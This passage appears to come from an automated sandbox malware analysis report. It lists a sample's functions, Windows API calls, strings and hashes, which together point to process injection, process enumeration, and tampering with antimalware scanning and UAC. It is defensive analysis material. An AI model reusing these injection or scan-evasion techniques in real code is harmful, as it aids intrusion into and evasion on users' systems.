                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02AAABA2
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02AAABB4
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02AAABC6
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02AAABD8
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02AAABEA
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02AAABFC
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02AAAC0E
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02AAAC20
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02AAAC32
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02AAAC44
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02AAAC56
                                                                                                                                          • Process32Next.KERNEL32(?,00000128), ref: 02AAADE9
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressProc$HandleModuleNextProcess32
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2237597116-0
                                                                                                                                          • Opcode ID: 5e1a3d4402020f2b807713b3a1eb6c05e99dcec749c838f4ccd65ca0f2845a65
                                                                                                                                          • Instruction ID: c429d47f537b70c54ceb5a81d9f4aad5071d36e1dbad8d8eaa8903f1b0e7f067
                                                                                                                                          • Opcode Fuzzy Hash: 5e1a3d4402020f2b807713b3a1eb6c05e99dcec749c838f4ccd65ca0f2845a65
                                                                                                                                          • Instruction Fuzzy Hash: E9C012A26022201B8A1066F82988AD78B9DCE4A2A630448A2A608E3103DF258C10E2A0
                                                                                                                                          Function 02A97E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,02AB356F,ScanString,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,ScanBuffer,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,Initialize), ref: 02A97E8B
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AttributesFile
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                          • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                          • Instruction ID: 073201c03d8841efc3d9f29d8ba6fa61a67030536a69f6d5a498b966b6fbd832
                                                                                                                                          • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                          • Instruction Fuzzy Hash: B4C08CF26212000E1E60A7BE1DC421942CD19881387601E21E438CA3C1EF1698232C30
                                                                                                                                          Function 02A97E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,02AB041F,ScanString,02B17380,02ABB7B8,OpenSession,02B17380,02ABB7B8,ScanString,02B17380,02ABB7B8,UacScan,02B17380,02ABB7B8,UacInitialize), ref: 02A97E67
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AttributesFile
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                          • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                          • Instruction ID: f612453514ab8a6fc6430d3a32a9ccff29fb8beba0c9cf53c8bd29b4a69a17ed
                                                                                                                                          • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                                          • Instruction Fuzzy Hash: 90C08CF02212000A5E5467BE2DC424952CE0D082387640A21A43CC62E2EF2298A32C20
                                                                                                                                          Function 02A94C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FreeString
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3341692771-0
                                                                                                                                          • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                          • Instruction ID: 915b21571cda7adebf87afd5e45378fb3e4d62887eb2fc2ec740cb3a3e241348
                                                                                                                                          • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                                          • Instruction Fuzzy Hash: 09C012B26402305BEF21579AADC075262DC9B09298B1400A19404D7254EB60980086A0
                                                                                                                                          Function 02ABC35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • timeSetEvent.WINMM(00002710,00000000,02ABC350,00000000,00000001), ref: 02ABC36C
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Eventtime
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2982266575-0
                                                                                                                                          • Opcode ID: 10ccc95455cadb8173eb77a7e4dffe9c7779be288755ac6eacda0d7a33879a74
                                                                                                                                          • Instruction ID: 024983de248156400142f06181e6d58df7c16f9741264c4129eb9c6e1c16af5b
                                                                                                                                          • Opcode Fuzzy Hash: 10ccc95455cadb8173eb77a7e4dffe9c7779be288755ac6eacda0d7a33879a74
                                                                                                                                          • Instruction Fuzzy Hash: 65C048F17907002AFA1196AA5CC2F66569EDB09B20F540652B604AA2D2DAA258108E68
                                                                                                                                          Function 02A915CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02A91A03,?,02A91FC1), ref: 02A915E2
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                          • Opcode ID: 36b21494ba35631bf4d610ca6395ac909632f91574a799e63412ddb189c06d9c
                                                                                                                                          • Instruction ID: 52ade221a9231a04970ceecd76c20d644ca15148fbb63ba474093c25d860a857
                                                                                                                                          • Opcode Fuzzy Hash: 36b21494ba35631bf4d610ca6395ac909632f91574a799e63412ddb189c06d9c
                                                                                                                                          • Instruction Fuzzy Hash: C1F0FFF0B913414FDB05DFBA99807057AF6EB8B385F948579D609DB398EB7184118B10
                                                                                                                                          Function 02A91682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02A91FC1), ref: 02A916A4
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                          • Opcode ID: c2f27099042f27100ea356a96599bbfd693fa2087500d95e0eb4cc991201113c
                                                                                                                                          • Instruction ID: 3d9f24ee46d72f6e59b50435300233069c9cb45389a5e979da96727eb2fde9f7
                                                                                                                                          • Opcode Fuzzy Hash: c2f27099042f27100ea356a96599bbfd693fa2087500d95e0eb4cc991201113c
                                                                                                                                          • Instruction Fuzzy Hash: 6FF090B2B406956BDB119F5A9C80782BBD8FB00354F450139EA0897340D770A810CB94
                                                                                                                                          Function 02A916E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02A91FE4), ref: 02A91704
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                          • Opcode ID: 6e50ae1b2243a5eeddcdb09cba0addfc4bb85e0e597caeaff7e0da4a3e8780dc
                                                                                                                                          • Instruction ID: c9eaaeeaff4272fb8a3c24de6ac7b7f91f0cbabbe4af7899f23aee73e1ce9e3f
                                                                                                                                          • Opcode Fuzzy Hash: 6e50ae1b2243a5eeddcdb09cba0addfc4bb85e0e597caeaff7e0da4a3e8780dc
                                                                                                                                          • Instruction Fuzzy Hash: 7BE08675340303AFDF105B7F5DC0712ABDCEB45654F144475F609DB281EA60E8108B60

                                                                                                                                          Non-executed Functions

                                                                                                                                          Function 02AAAB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02AAADA3,?,?,02AAAE35,00000000,02AAAF11), ref: 02AAAB30
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02AAAB48
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02AAAB5A
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02AAAB6C
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02AAAB7E
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02AAAB90
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02AAABA2
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02AAABB4
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02AAABC6
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02AAABD8
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02AAABEA
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02AAABFC
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02AAAC0E
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02AAAC20
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02AAAC32
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02AAAC44
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02AAAC56
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                          • API String ID: 667068680-597814768
                                                                                                                                          • Opcode ID: 1935f405db749c5ebd26cdd8872e1b50773127ae959ca5e5ad2a4a9bfe56653a
                                                                                                                                          • Instruction ID: 62699a54d2e5993974a9689df525be5fde4726212bf9cbe3159420ceb1dbf006
                                                                                                                                          • Opcode Fuzzy Hash: 1935f405db749c5ebd26cdd8872e1b50773127ae959ca5e5ad2a4a9bfe56653a
                                                                                                                                          • Instruction Fuzzy Hash: 0F31E1B1A80350AFFF04EFA5D995A2977F9FF16B41B800961A901DF206EF78A810DF11
                                                                                                                                          Function 02AA8D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA89D0: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,02B1738C,Function_0000662C,00000004,02B1739C,02B1738C,05F5E103,00000040,02B173A0,75370000,00000000,00000000), ref: 02AA8AAA
                                                                                                                                          • GetThreadContext.KERNEL32(00000000,02B17424,ScanString,02B173A8,02AAA93C,UacInitialize,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,UacInitialize,02B173A8), ref: 02AA9602
                                                                                                                                            • Part of subcall function 02AA7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02AA7A9F
                                                                                                                                            • Part of subcall function 02AA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AA7DEC
                                                                                                                                          • SetThreadContext.KERNEL32(00000000,02B17424,ScanBuffer,02B173A8,02AAA93C,ScanString,02B173A8,02AAA93C,Initialize,02B173A8,02AAA93C,00000000,-00000008,02B174FC,00000004,02B17500), ref: 02AAA317
                                                                                                                                          • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02B17424,ScanBuffer,02B173A8,02AAA93C,ScanString,02B173A8,02AAA93C,Initialize,02B173A8,02AAA93C,00000000,-00000008,02B174FC), ref: 02AAA324
                                                                                                                                            • Part of subcall function 02AA894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize,02B173A8,02AAA93C,UacScan), ref: 02AA8960
                                                                                                                                            • Part of subcall function 02AA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02AA897A
                                                                                                                                            • Part of subcall function 02AA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize), ref: 02AA89B6
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: LibraryThread$ContextFreeMemoryVirtual$AddressAllocateLoadProcResumeWrite
                                                                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                          • API String ID: 4000721993-51457883
                                                                                                                                          • Opcode ID: fd2d33c2b4c334cf36cd86e469a5fa0933189f512d148c1e6d445a78892a9356
                                                                                                                                          • Instruction ID: b12685418f47bad6caa1a27bcf5636f0d7963df617d3aebcd806039dbaf8d24d
                                                                                                                                          • Opcode Fuzzy Hash: fd2d33c2b4c334cf36cd86e469a5fa0933189f512d148c1e6d445a78892a9356
                                                                                                                                          • Instruction Fuzzy Hash: B9E2FC75A805189FDF11EB65DE90BCEB3FABF88300F5041A6A109AB215DF30AE46DF51
                                                                                                                                          Function 02AA8D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA89D0: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,02B1738C,Function_0000662C,00000004,02B1739C,02B1738C,05F5E103,00000040,02B173A0,75370000,00000000,00000000), ref: 02AA8AAA
                                                                                                                                          • GetThreadContext.KERNEL32(00000000,02B17424,ScanString,02B173A8,02AAA93C,UacInitialize,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,UacInitialize,02B173A8), ref: 02AA9602
                                                                                                                                            • Part of subcall function 02AA7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02AA7A9F
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AllocateContextFreeLibraryMemoryThreadVirtual
                                                                                                                                          • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                          • API String ID: 2456445956-51457883
                                                                                                                                          • Opcode ID: 223e535379e1b5b1d2bc24540e717359b6eba603e1a1807ade79f050ad194f7f
                                                                                                                                          • Instruction ID: 187467b0ec65d97c4fa071f0a9acecda70833559930dcd559aa3646b4cfa3d75
                                                                                                                                          • Opcode Fuzzy Hash: 223e535379e1b5b1d2bc24540e717359b6eba603e1a1807ade79f050ad194f7f
                                                                                                                                          • Instruction Fuzzy Hash: 11E2EC75A805189FDF11EB65DE90BCEB3FABF88300F5041A6A109AB215DF30AE46DF51
                                                                                                                                          Function 02A95908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,02A96C14,02A90000,02ABE790), ref: 02A95925
                                                                                                                                          • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02A9593C
                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?), ref: 02A9596C
                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02A96C14,02A90000,02ABE790), ref: 02A959D0
                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02A96C14,02A90000,02ABE790), ref: 02A95A06
                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02A96C14,02A90000,02ABE790), ref: 02A95A19
                                                                                                                                          • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A96C14,02A90000,02ABE790), ref: 02A95A2B
                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A96C14,02A90000,02ABE790), ref: 02A95A37
                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A96C14,02A90000), ref: 02A95A6B
                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02A96C14), ref: 02A95A77
                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02A95A99
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmpDownload File
